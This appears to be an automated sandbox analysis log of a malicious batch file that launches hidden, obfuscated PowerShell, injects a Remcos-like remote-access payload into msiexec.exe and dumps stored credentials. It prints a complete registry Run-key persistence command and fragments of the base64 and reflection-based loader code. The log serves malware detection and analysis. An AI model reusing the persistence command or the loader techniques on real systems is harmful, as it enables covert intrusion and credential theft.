                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_00406DFC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_00406E9F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004068B5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_004072B5

                E-Banking Fraud

                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7800, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                Source: amsi32_7580.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7344, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7580, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004016FD NtdllDefWindowProc_A,16_2_004016FD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004017B7 NtdllDefWindowProc_A,16_2_004017B7
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00402CAC NtdllDefWindowProc_A,17_2_00402CAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00402D66 NtdllDefWindowProc_A,17_2_00402D66
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5969
                Source: unknownProcess created: Commandline size = 5993
                Source: amsi32_7580.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7344, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7580, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@22/14@10/3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,15_2_004182CE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,17_2_00410DE1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,15_2_00418758
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,15_2_00413D4C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,15_2_004148B6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Trykimprgneredes.Ene
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-I42HQ2
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x45nip12.f4u.ps1
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" "
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs"
                Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7344
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7580
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msiexec.exe, 0000000F.00000002.1968628137.00000000043AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_16-33236
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.*j[P source: msiexec.exe, 00000010.00000002.1958810388.0000000002F77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Automation.pdb source: powershell.exe, 00000005.00000002.1669372747.0000000007535000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1677454794.00000000086D0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*tK source: msiexec.exe, 00000010.00000002.1958810388.0000000002F77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\<.oeaccount source: msiexec.exe, 00000010.00000002.1958810388.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.1677454794.00000000086D0000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: Yara match File source: 00000005.00000002.1679189709.000000000A606000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.1678908955.0000000008980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.1657579338.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.1476663613.0000013F90071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Kommenterendes)$GLobaL:paTeNTeRINgeRNES = [sYSTeM.text.enCODIng]::aSCII.GEtStRInG($fALDeRebstrAPpEs)$GLoBaL:eUryAleaN=$patenTERingerneS.subSTRIng($ForVRreLsER,$syNClASTic)<#Trisubsti
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((amorbuer $Formandsposts $Loydie), (Pyrotechny146 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bedeslagenes = [AppDomain]::CurrentDomain.GetAssemblies()$
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Brochering)), $Variotinted119).DefineDynamicModule($Trisaccharose, $false).DefineType($Menusektioners, $Remaker, [System.MulticastDele
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Kommenterendes)$GLobaL:paTeNTeRINgeRNES = [sYSTeM.text.enCODIng]::aSCII.GEtStRInG($fALDeRebstrAPpEs)$GLoBaL:eUryAleaN=$patenTERingerneS.subSTRIng($ForVRreLsER,$syNClASTic)<#Trisubsti
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden [obfuscated PowerShell command line omitted]
                Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted]
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,15_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887AF09CA push E85E1B5Dh; ret 3_2_00007FF887AF09F9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887AF7962 push ebx; retf 3_2_00007FF887AF796A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044693D push ecx; ret 15_2_0044694D
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00451D54 push eax; ret 15_2_00451D61
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00451D34 push eax; ret 16_2_00451D41
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00444E71 push ecx; ret 16_2_00444E81
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00414060 push eax; ret 17_2_00414074
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00414060 push eax; ret 17_2_0041409C
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00414039 push ecx; ret 17_2_00414049
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4
                Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_004047CB
                Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4390
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5502
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5898
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3832
                Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.3 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7684 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 8060 Thread sleep time: -119000s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 8064 Thread sleep time: -7554000s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 8064 Thread sleep time: -20976000s >= -30000s
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00418981 memset,GetSystemInfo
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                Source: msiexec.exe, 00000008.00000003.2763354092.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715933734.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A37000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: bhv6BC6.tmp.15.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                Source: msiexec.exe, 00000008.00000003.2735060631.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715933734.0000000008A37000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWee}
                Source: powershell.exe, 00000003.00000002.1487036009.0000013FEA182000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\msiexec.exe API call chain: ExitProcess graph end node graph_16-34015
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
                Source: Yara match File source: amsi64_7344.amsi.csv, type: OTHER
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 7344, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 7580, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4060000
